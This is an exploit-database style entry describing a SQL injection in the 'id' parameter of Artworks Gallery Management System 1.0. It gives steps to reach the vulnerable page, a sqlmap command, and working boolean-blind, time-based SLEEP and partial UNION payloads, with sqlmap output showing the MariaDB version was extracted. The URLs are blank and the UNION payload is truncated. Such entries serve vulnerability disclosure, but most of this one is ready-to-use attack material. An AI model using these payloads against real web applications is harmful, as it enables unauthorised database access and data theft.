# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection  
# Exploit Author: Vijay Sachdeva  
# Date: 2020-12-22  
# Vendor Homepage:  
# Software Link:  
# Affected Version: Version 1  
# Tested on Kali Linux  
Step 1. Log in to the application with admin credentials.  
Step 2. Click on "Explore" and then select "Artworks".  
Step 3. Choose any item, the URL should be "  
Step 4. Run sqlmap on the URL where the "id" parameter is given  
sqlmap -u "" --banner  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=8 AND 4531=4531  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)  
Type: UNION query  
Title: Generic UNION query (NULL) - 9 columns  
Payload: id=8 UNION ALL SELECT  
[08:18:34] [INFO] the back-end DBMS is MySQL  
[08:18:34] [INFO] fetching banner  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
banner: '10.3.24-MariaDB-2'  
Step 5. Sqlmap should inject the web-app successfully which leads to  
information disclosure.